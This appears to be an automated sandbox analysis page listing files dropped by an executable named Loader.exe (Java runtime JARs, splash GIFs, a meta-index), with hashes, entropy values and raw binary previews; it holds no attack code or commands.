                                                                                                                                                                                                                                                                                                              Preview:GIF89a@................................................FFF...T..W..V..Is.Kv.W..W..U..Hr.P|.O{.Mx.Gq.Jt.Fo.Fp.V..U..Gp.T..Lw.P|.R..Q~.S..S..Nz.Lw.Hq.Ju.X..V..Lx.It.U..Hs.Ny.Nz.P}.R~.S..R~.R..Q}.Q}.My.Lv.It.O{.Ku.My.Oz.Gp.Gq.Hr.....................WWW.........Ry.uuu............i......ggg...]..................{..y..d..........Sz................s............i...............c............v.....X........r...........]........^........p.....z.........r..Y..l..m...............]................Mu........Qw.Nw.........v.....b..j.......V}.]........d.....k........v........Lu....S|.U{.Oy................W........Lv.U..R}.....Nv.Gp.Nx.Ks....Jr....Hq......V~.T..S~.Z.....Gq.O{.......W..Qz.......Lw.Z.....T...........S~....Lt.Kv....V.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\splash@2x.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15276
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.949850025334252
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                                                                                                                                                                                                                                                                                              MD5:CB81FED291361D1DD745202659857B1B
                                                                                                                                                                                                                                                                                                              SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                                                                                                                                                                                                                                                                                              SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                                                                                                                                                                                                                                                                                              SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a..............................................FFF...W..V..Is.Hr.W..W..U..P|.T..Kv.O{.V..Mx....S..Fp.Jt.Lw.Gp.Gq.Lw.U..T..R..Q~.Fo.Nz.R~.R..Q}.My.Ju.It.Oz.Gp.Nz.Gq.V..Ny.Hq.P|.P}.S..S..S..Q}.Ku.Ku.Hr.Lx.X..Mx.It.U..Is.Hs.T..O{.R~.T..O{.Kv.My.Lv..........i...........]..WWWu...........ggguuut.......................................Ry.......{..............b..........................^..l.................X}....a..{.....c..................v..m........T{.f.....l........X.........................j..U|...........`........j..g..U~........^.....Qz.Jr.Nw.p.....v.....p.....Gp....r..Mt.......y..q.....]..Nv............Tz.Y.....[.....Pw....Ox..............X.....Y..X..W..V..S|............Mx....Mv.Kt.U..Hq.Lv.W.....Mu.i..Q{.Gq.Lt.S~.T..U..Kv................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\splash_11-lic.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7805
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.877495465139721
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                                                                                                                                                                                                                                                                                              MD5:9E8F541E6CEBA93C12D272840CC555F8
                                                                                                                                                                                                                                                                                                              SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                                                                                                                                                                                                                                                                                              SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                                                                                                                                                                                                                                                                                              SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a@...................................{...........c.....P|.l.....].............Ry.........S{.i.....U~........................uuuV..b........T.....WWW}..R~.......Hr.v..T|.It..........n.............e..f.....].........Hq.`........Y.....i..r.._..l...........]..Y.....v..................s..f.....z.....\........Jr.r.....................i..e.....p.....Y..m........Z..Sz.Ow....Y..Nx.{..w..Jr.T..R}....Pw.Lt.s..`..W..W..Lv...........................................FFF...W..V..Is.Kv.W..W..U..Hr.O{.Mx.Jt.Gq.Fp.Gp.Lw.Fo.U..T..Q~.R..P|.Lw.S..S..Ju.Nz.V..X..V..U..Ny.Hs.My.Ku.My.Q}.R~.P}.Q}.R..S..S..O{.Oz.Lx.Nz.Lv.It.Gp.Gq....ggg.....................S...............S|....Gp........Mw.S~.Px.Nz.Pz.......Lt.Kv.a.....V.....r.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\splash_11@2x-lic.gif

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):12250
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.901446927123525
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                                                                                                                                                                                                                                                                                              MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                                                                                                                                                                                                                                                                                              SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                                                                                                                                                                                                                                                                                              SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                                                                                                                                                                                                                                                                                              SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.......{.....k......{...........P|.b..V......................Hr.Hq.......................]...........X...........f.............i............R~....u..It.u.....l..T~.......Qz.......^..Q~....i.......b.............Qx.Y..Y.....q..p.....v..............a..U|......T..Y........................^..n........f.....Tz.e..j..f..Ox.p..Y~.Ov.......y..Z..h.....l.....W.....w.....R|.p.....X~.a........Pw.Ks.Ir.......^.....Kt.FFF\........Ox...........W..U..Nw.Mu.W..V..Is.V..Hr.R~.W..W..U..T..O{.Kv.Gp.S..Mx.Lw.Fp.Lw.U..T..Jt.R..Gq.Fo.Ju.My.R..Q}.R~.Nz.Oz.It.Nz.V..V..Gp.Ny.Ku.P|.Ku.Gq.P}.S..Q}.S..S..Is.Lx.U..O{.Hs.T..O{.My.Mx.Kv.Lv............iii...YYY.............xxx........._.....U..Gp.U..Lv.Mw....Oz......S|.S}.Hq.\..Kv....Mv.P{.W..T........Mw.T.....Nz.q..Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\access-bridge-32.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):187736
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.79606817499301
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:9Mxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBgvH6:ONduOJv29amxGiDtonI87aGBgva
                                                                                                                                                                                                                                                                                                              MD5:13794986CA59819F6AF7BD70022D7F8F
                                                                                                                                                                                                                                                                                                              SHA1:6C5609CD023EB001DC82F1E989D535CD7AD407EE
                                                                                                                                                                                                                                                                                                              SHA-256:AF555DD438214DCD68D55EBDDCC0A05BF47DEF0EFD9920E3955D11CC2623628E
                                                                                                                                                                                                                                                                                                              SHA-512:2E3C4E76FD911EFF5F6983D6D7FBB0F998E5FB0BFE11921A83AC9F19BFB0C28B157354F1AC790094C354845025AB42F5A921FDDF2A780497431F3912D7D3E518
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........z..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\access-bridge.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):187727
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.7958934328326075
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:aMxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBPlHl:nNduOJv29amxGiDtonI87aGBPlF
                                                                                                                                                                                                                                                                                                              MD5:82C16750374D5CCA5FDAA9434BAF8143
                                                                                                                                                                                                                                                                                                              SHA1:9B49F07BFB6F4AE73EB9B2FADCAE46E02E31F023
                                                                                                                                                                                                                                                                                                              SHA-256:1F0966EBD65544669395E9F490A3D397DCF122D5261566734BB422C68CFE64B8
                                                                                                                                                                                                                                                                                                              SHA-512:12A32FBE2A0A824EC33BD6D0A22066C0CB74D13EEBC16622FFE420CD48B4EB5878C981384DEBE30285D6231B3224E5CD2380C22D8C18624E52E5C74B62221661
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\cldrdata.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3860522
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9670916513081735
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:98304:PI1SwP9utPgTIb0bxSxwF1nNZVdEILeH9IIyYNO4Inwz:PI1HYgkoxSxI9fs4UVIwz
                                                                                                                                                                                                                                                                                                              MD5:AE86774D28F1C8270A9BCBD12A9A1865
                                                                                                                                                                                                                                                                                                              SHA1:7806C70550F435C2C87D2D15E427E5A9F97774E4
                                                                                                                                                                                                                                                                                                              SHA-256:0402FBCB23D381DEDE4DF4228F2D100D8693C5B3BAB885AB5EB98BCC0A269786
                                                                                                                                                                                                                                                                                                              SHA-512:2EA1E0372A087915FFFCCA2DEFC817C37BD038B02824BFEC1DA4E881A4C908A93AEB37DAA38840F75BCEAFD02EC09088FE648B0305DA0407E93407EAC770BE63
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.q.B........E..%.).N. e.z.......E..9....E..E.%@...\.\.PK...n..N...Z...PK...........H................sun/text/resources/cldr/aa/FormatData_aa.classmPMO.@.}........(.@..xB....!b,1i8..6X..I.5._.'.....(..".9.yy3.f?..?..`?...*6T.5l....aG......=...mqN.......t...:6g.;`^....d.L..\0.|.b...w&.....c.;...8%H...........RqA.......b. ..p./G......B0..K.Sx6...>4\....Zy.!..".R.N....T....=..c~d.7...3(5.<.....a;F....\....a8@..a.@..d^.]YV"k....U...2'#...rX.K...ue...O....bZ.:CB...jZ.]3...2M.s....3}.ct%.GV..PK...]..d.......PK...........H................sun/text/resources/cldr/af/FormatData_af.classuV.x[W.>...a[y......R.+-..K].I.4..(...b.=....a.h...({..B!...{.U......w../...y...?.;w>.u..w..A.......xE.nFxe.nAx...^.p+.k.^..z.7 ...M.oFx..[...v.3..!.....Bx7.{.nGx/....@x?...."..A..!|....G.>..1..#|....B......A.,...>..../"|...._A.*........o"|.....A...........".

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\dnsns.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):8286
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.790619326925194
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:tX5jIgU7WbMCc0XmHTEIWB7EH+mqcEb+wYtvEmkbKdG:tXZU7WbMoWTFWBAH+BCrEmkh
                                                                                                                                                                                                                                                                                                              MD5:7FA7F97FA1CC0CC8ACC37B9DAE4464AE
                                                                                                                                                                                                                                                                                                              SHA1:C143646A6DBE2EBDB1FBF69C09793E7F07DBC1F5
                                                                                                                                                                                                                                                                                                              SHA-256:36820223C5B9A225DC3FF7C1C3930BDB112F1D9AAB2BEE954FF1A1C1828E2C54
                                                                                                                                                                                                                                                                                                              SHA-512:AD9A0E358BE7A765B4A554E6BBE35BDD61A52BCAC9F21915D84C2A1929780150DFDCF0E43121D0E844082B1BB92873ED848ACF9B38FF3C7D826E5D0F5D32C26C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$1.class.S]O.A.=......./@."e.,(>AH.` )..g.......l../j....LD..F_.M.xw.j.....s.{g.~.........d.n...9.0e.N..i.E.......~A.&.H..7....[<.7|....]f_.....r.)W....*~(B....nM..F.Z!.z.....Ye.(...B.3..2.AM0......pO..x.!.#.0U.I.G..Tu.&..L.......e.![.U..;...-.2.6.<.02P..9...R.......la...*.H....!.."-..H..E].Z.k^.W:p.J^s. .x .c..7j>.A..T...TfG...f....!.6zm.p.F..-.q.K.....1.!.w.C+,2..J....0.!C...0Lw...@..s[.cmp%I-.5..o...1.D].]q..4..-.t1...m.q.3.;\....D.+/..../...N....uv...R.|<<.2M...4...O.yz.F*A...).3{.....7....]..g.i..9&m.[.......K_.}.,;)}F..VR.w........|I.+..B.a...F.-C....h......Y...N...t..D.:.<..d..u`..r..B...PK..K.".u.......PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$2.class.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\jaccess.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):44516
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.905075370162141
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:2YVL1eqfgKbWnXuZ/QvfBPJr+A6tkZQnWn109KqM9jE4z:2KL1eWgfnXuEfJQAdQnWn10kqg3z
                                                                                                                                                                                                                                                                                                              MD5:1A33FF1FDD789E655D5E2E99E9E719BD
                                                                                                                                                                                                                                                                                                              SHA1:AE88E6000EBD7F547E3C047FC81AE1F65016B819
                                                                                                                                                                                                                                                                                                              SHA-256:A23A9A653A261C640703B42839137F8C4BF7650665E62DBDD7D538171BD72516
                                                                                                                                                                                                                                                                                                              SHA-512:0451393D805414D6633824F3D18B609F7495324FAB56DF4330E874A8995BD9E0DA567D77DB682D7FD1544CD7E6A3D10745C23DB575035E391B02D6EE4C4362FD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............Z...com/sun/java/accessibility/util/AccessibilityEventMonitor$AccessibilityEventListener.class.Wkp.........5..5..A6`l..C\j.A...eb)..)dm....J+..h...I.&&...L.4.3.$.aH.q.....M...i..m......KNf4.y..~.9g.>.....[p.:....n..p....(........#.D'".ta/.>.D7.|.s.!..f.o......#\w?o...;q..]x....B...~.....t..4>?.#N.1$Aw........;..#j.HJ0%..p...M.5...V[.. ...*......P...).qZ)......a-i...H2.EM..H.2l.H.eX_.>..(..J_..Lj.Z\3G...,...C|.....T..$,.q.OX...[.u..Qg..6..:...iz.q.-.*...:sD@9j.2[..w..I3a.r....cXM..m..}P..J.WU.d`o.nhD.3.=).)..o2..F*...8^k...f)t.........G...e|.....C*K."#.F...,.m.q..I8)....$..x^......e..?..c.D..8..e..7...U..8..dl...rc.s.7d..3...x.....E`.....n/.8.qY......i.~BQ..\.1.K2~.K...s.C.YN...@.Lh...i....PwwW.W...2.z....<%..F..+..xW.e...K.W0...3......J..)S.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\jfxrt.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):18192143
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.977388717447885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:ZxJ9lXlkEhZWLyyQSgxv1/FGfnIWkRXe2p0F7tjRozGfVgMS55pU13JbL5xli3d6:ZhLk2bBSgnFGfnhAXLzAeylvi3dGT
                                                                                                                                                                                                                                                                                                              MD5:042B3675517D6A637B95014523B1FD7D
                                                                                                                                                                                                                                                                                                              SHA1:82161CAF5F0A4112686E4889A9E207C7BA62A880
                                                                                                                                                                                                                                                                                                              SHA-256:A570F20F8410F9B1B7E093957BF0AE53CAE4731AFAEA624339AA2A897A635F22
                                                                                                                                                                                                                                                                                                              SHA-512:7672D0B50A92E854D3BD3724D01084CC10A90678B768E9A627BAF761993E56A0C6C62C19155649FE9A8CEEABF845D86CBBB606554872AE789018A8B66E5A2B35
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H..>.g...g.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.8.2..Created-By: 1.8.0_40-b27 (Oracle Corporation)....PK..........H................com/PK..........H................com/sun/PK........j..H................com/sun/deploy/PK........j..H................com/sun/deploy/uitoolkit/PK........j..H................com/sun/deploy/uitoolkit/impl/PK...........H............!...com/sun/deploy/uitoolkit/impl/fx/PK...........H............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK...........H................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK...........H............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK........}..H................com/sun/glass/PK...........H................com/sun/glass/events/PK...........H................com/sun/glass/ui/PK...........H................com/sun/glass/ui/delegate/PK...........H................com/sun/glass/ui/win/PK..........H................com/su

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\localedata.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1178848
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.964832897711047
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                                                                                                                                                                                                                                                                                              MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                                                                                                                                                                                                                                                                                              SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                                                                                                                                                                                                                                                                                              SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                                                                                                                                                                                                                                                                                              SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........u..H................META-INF/......PK..............PK........u..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............,...sun/text/resources/ar/CollationData_ar.classm..O.A...Y[("...E..Q.....z....M.1A.f....m.n.G|._.WP@.R^T.D._.......b.N.H.....<..!._....!...j...#bCD.U..*.1"6ED.#*[..xp....;.:"....Q..O.'..:....3..5.~.J.~2.8.a.......e/....S....A.#.c.l...<n.ljM%.^.O%.y.w.K.;jD.X...._......,.B'\.;'.K.{...x.G..cL...9^`..x.W..0F....!...P.8&0.)..[..+.e.T.\.+w."g.YW.E...]....[....c....}.(.b..m1n..<`..[,..-&m...C.....W....}..k>y..x.....X K.fY..1.1..L.z.;.K.....n}..4...f0..|6.}..0..X."..+=.........n...6.Y.............l.o..%..w.8Ks..gq......3t/8C.........~<..<.3<....%....0F...(r..1..\5s..UO..jf..L..f...........................!.!.!.!.!.!.a..............................n&..... ..3.76.....#....l.OD......G.../..J.W..*...k5.V..........?.V..6...F...t.....X...X.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\meta-index

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1511
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.142622776492157
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                                                                                                                                                                                                                                                                                              MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                                                                                                                                                                                                                                                                                              SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                                                                                                                                                                                                                                                                                              SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                                                                                                                                                                                                                                                                                              SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\nashorn.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2018860
